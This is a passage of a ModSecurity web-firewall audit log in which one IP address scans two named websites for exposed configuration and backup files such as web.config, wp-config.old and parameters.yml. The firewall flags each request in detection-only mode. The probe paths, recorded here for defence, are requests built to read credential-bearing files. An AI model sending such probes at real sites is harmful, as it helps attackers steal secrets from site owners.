www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0a7b3217-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0a7b3217-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/app.config"] [unique_id "aE3pJG1_24bael5AsqHJFgAAAAo"] Stopwatch: 1749936420375248 2146 (- - -) Stopwatch2: 1749936420375248 2146; combined=1303, p1=281, p2=968, p3=0, p4=0, p5=54, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0a7b3217-Z-- --72b4b24d-A-- [15/Jun/2025:02:57:01.372996 +0530] aE3pJfBViRrxRfhQ2snRPAAAAAE 185.177.72.108 57874 127.0.0.1 7080 --72b4b24d-B-- GET /app/config/parameters.ini HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --72b4b24d-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --72b4b24d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/app/config/parameters.ini"] [unique_id "aE3pJfBViRrxRfhQ2snRPAAAAAE"] Stopwatch: 1749936421370033 3018 (- - -) Stopwatch2: 1749936421370033 3018; combined=1767, p1=289, p2=1408, p3=0, p4=0, p5=69, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --72b4b24d-Z-- --05b72c60-A-- [15/Jun/2025:02:57:01.498065 +0530] aE3pJZ4hb3-ZG-auIyDOSAAAAAg 185.177.72.108 57888 127.0.0.1 7080 --05b72c60-B-- GET /app/config/parameters.yml HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --05b72c60-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --05b72c60-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/app/config/parameters.yml"] [unique_id "aE3pJZ4hb3-ZG-auIyDOSAAAAAg"] Stopwatch: 1749936421495123 2996 (- - -) Stopwatch2: 1749936421495123 2996; combined=1724, p1=405, p2=1259, p3=0, p4=0, p5=59, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05b72c60-Z-- --d9c81e4b-A-- [15/Jun/2025:02:57:01.644846 +0530] aE3pJeQxpfcsz2uNnR-jyAAAAAI 185.177.72.108 57904 127.0.0.1 7080 --d9c81e4b-B-- GET /app/config/routes.cfg HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d9c81e4b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d9c81e4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/app/config/routes.cfg"] [unique_id "aE3pJeQxpfcsz2uNnR-jyAAAAAI"] Stopwatch: 1749936421641647 3254 (- - -) Stopwatch2: 1749936421641647 3254; combined=1978, p1=326, p2=1590, p3=0, p4=0, p5=62, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9c81e4b-Z-- --76cdc115-A-- [15/Jun/2025:02:57:01.925195 +0530] aE3pJCQOy0yoNZQ7dslNuQAAAAk 185.177.72.108 53808 127.0.0.1 7081 --76cdc115-B-- GET /a.htaccess HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --76cdc115-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 WPO-Cache-Status: not cached WPO-Cache-Message: The file path is unsuitable for caching (/a.htaccess) Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --76cdc115-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/a.htaccess"] [unique_id "aE3pJCQOy0yoNZQ7dslNuQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936420370912 1554368 (- - -) Stopwatch2: 1749936420370912 1554368; combined=1820, p1=357, p2=1343, p3=0, p4=0, p5=119, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76cdc115-Z-- --c0762010-A-- [15/Jun/2025:02:57:01.980037 +0530] aE3pJTpSduy_dUF9ffnD1AAAAAU 185.177.72.108 57928 127.0.0.1 7080 --c0762010-B-- GET /admin/.config HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c0762010-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c0762010-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/admin/.config"] [unique_id "aE3pJTpSduy_dUF9ffnD1AAAAAU"] Stopwatch: 1749936421975950 4166 (- - -) Stopwatch2: 1749936421975950 4166; combined=2476, p1=538, p2=1861, p3=0, p4=0, p5=77, sr=186, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0762010-Z-- --abeff84c-A-- [15/Jun/2025:02:57:02.211473 +0530] aE3pJvBViRrxRfhQ2snRPQAAAAE 185.177.72.108 57944 127.0.0.1 7080 --abeff84c-B-- GET /web.config HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --abeff84c-F-- HTTP/1.1 200 OK X-Accel-Version: 0.01 Last-Modified: Mon, 11 Mar 2024 22:37:46 GMT ETag: "34f-6136a30c5e280" Accept-Ranges: bytes Content-Length: 847 Connection: close --abeff84c-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config"] [unique_id "aE3pJvBViRrxRfhQ2snRPQAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/web.config"] [unique_id "aE3pJvBViRrxRfhQ2snRPQAAAAE"] Stopwatch: 1749936422207021 4527 (- - -) Stopwatch2: 1749936422207021 4527; combined=2644, p1=557, p2=1935, p3=31, p4=29, p5=92, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --abeff84c-Z-- --639bd33a-A-- [15/Jun/2025:02:57:02.322340 +0530] aE3pJtlaOcxgn8EdjwOwIQAAAAc 185.177.72.108 57948 127.0.0.1 7080 --639bd33a-B-- GET /web.config.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --639bd33a-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --639bd33a-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config.bak"] [unique_id "aE3pJtlaOcxgn8EdjwOwIQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/web.config.bak"] [unique_id "aE3pJtlaOcxgn8EdjwOwIQAAAAc"] Stopwatch: 1749936422318990 3413 (- - -) Stopwatch2: 1749936422318990 3413; combined=2052, p1=410, p2=1546, p3=0, p4=0, p5=96, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --639bd33a-Z-- --8b3a5d19-A-- [15/Jun/2025:02:57:02.433050 +0530] aE3pJp4hb3-ZG-auIyDOSQAAAAg 185.177.72.108 57952 127.0.0.1 7080 --8b3a5d19-B-- GET /web.config.bakup HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8b3a5d19-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8b3a5d19-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config.bakup"] [unique_id "aE3pJp4hb3-ZG-auIyDOSQAAAAg"] Stopwatch: 1749936422429675 3430 (- - -) Stopwatch2: 1749936422429675 3430; combined=2027, p1=429, p2=1540, p3=0, p4=0, p5=58, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8b3a5d19-Z-- --fb0c2731-A-- [15/Jun/2025:02:57:02.544474 +0530] aE3pJtAcUP5X8o425y3XHwAAAAQ 185.177.72.108 57968 127.0.0.1 7080 --fb0c2731-B-- GET /web.config.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fb0c2731-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fb0c2731-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config.old"] [unique_id "aE3pJtAcUP5X8o425y3XHwAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/web.config.old"] [unique_id "aE3pJtAcUP5X8o425y3XHwAAAAQ"] Stopwatch: 1749936422540304 4242 (- - -) Stopwatch2: 1749936422540304 4242; combined=2593, p1=597, p2=1868, p3=0, p4=0, p5=128, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb0c2731-Z-- --8a9de336-A-- [15/Jun/2025:02:57:02.655235 +0530] aE3pJvCFSLfJixou_W0k3AAAAAY 185.177.72.108 57980 127.0.0.1 7080 --8a9de336-B-- GET /web.config.temp HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8a9de336-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8a9de336-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config.temp"] [unique_id "aE3pJvCFSLfJixou_W0k3AAAAAY"] Stopwatch: 1749936422651665 3643 (- - -) Stopwatch2: 1749936422651665 3643; combined=2111, p1=462, p2=1579, p3=0, p4=0, p5=69, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8a9de336-Z-- --ea670558-A-- [15/Jun/2025:02:57:02.766360 +0530] aE3pJiQOy0yoNZQ7dslNugAAAAk 185.177.72.108 57990 127.0.0.1 7080 --ea670558-B-- GET /web.config.tmp HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ea670558-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ea670558-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config.tmp"] [unique_id "aE3pJiQOy0yoNZQ7dslNugAAAAk"] Stopwatch: 1749936422763033 3407 (- - -) Stopwatch2: 1749936422763033 3407; combined=1998, p1=404, p2=1529, p3=0, p4=0, p5=65, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea670558-Z-- --d0963b57-A-- [15/Jun/2025:02:57:02.880524 +0530] aE3pJjpSduy_dUF9ffnD1QAAAAU 185.177.72.108 57996 127.0.0.1 7080 --d0963b57-B-- GET /web.config.txt HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d0963b57-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d0963b57-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/web.config.txt"] [unique_id "aE3pJjpSduy_dUF9ffnD1QAAAAU"] Stopwatch: 1749936422877202 3385 (- - -) Stopwatch2: 1749936422877202 3385; combined=2009, p1=422, p2=1495, p3=0, p4=0, p5=92, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0963b57-Z-- --84301343-A-- [15/Jun/2025:02:57:02.991181 +0530] aE3pJm1_24bael5AsqHJGQAAAAo 185.177.72.108 58004 127.0.0.1 7080 --84301343-B-- GET /wp-config.inc HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --84301343-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --84301343-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.inc"] [unique_id "aE3pJm1_24bael5AsqHJGQAAAAo"] Stopwatch: 1749936422987859 3375 (- - -) Stopwatch2: 1749936422987859 3375; combined=2029, p1=353, p2=1623, p3=0, p4=0, p5=53, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --84301343-Z-- --0aa64c3c-A-- [15/Jun/2025:02:57:03.105318 +0530] aE3pJ9laOcxgn8EdjwOwIgAAAAc 185.177.72.108 58020 127.0.0.1 7080 --0aa64c3c-B-- GET /wp-config.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0aa64c3c-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0aa64c3c-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile 